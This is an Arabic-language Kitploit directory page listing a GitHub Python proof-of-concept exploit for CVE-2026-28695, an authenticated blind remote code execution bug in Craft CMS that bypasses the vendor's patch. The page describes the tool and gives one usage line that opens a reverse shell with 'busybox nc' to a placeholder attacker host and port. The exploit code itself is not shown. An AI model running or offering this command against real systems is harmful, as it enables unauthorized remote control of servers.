Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-28695 — استغلال Python PoC لـ CVE-2026-28695، وهو RCE أعمى مُصادَق عليه في Craft CMS يتجاوز تصحيح create() الخاص بـ BaseObject ويُنشئ reverse shell. | Kitploit
أدوات/GitHubGitHub/predyy/cve-2026-28695
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubpredyy/cve-2026-28695

CVE-2026-28695

استغلال Python PoC لـ CVE-2026-28695، وهو RCE أعمى مُصادَق عليه في Craft CMS يتجاوز تصحيح create() الخاص بـ BaseObject ويُنشئ reverse shell.

عرض المستودع
13منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تجاوز تصحيح CVE-2026-28695 - تنفيذ تعليمات برمجية عن بُعد بشكل أعمى في Craft CMS

تنفيذ تعليمات برمجية عن بُعد بشكل أعمى بعد المصادقة في Craft CMS. يتجاوز قيد create() - BaseObject المُضاف في إصلاح CVE-2026-28695 (commit e31e508).

الاستخدام

python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال. تأكد دائمًا من حصولك على الإذن قبل اختبار أو استغلال الثغرات!

تنزيل الأداة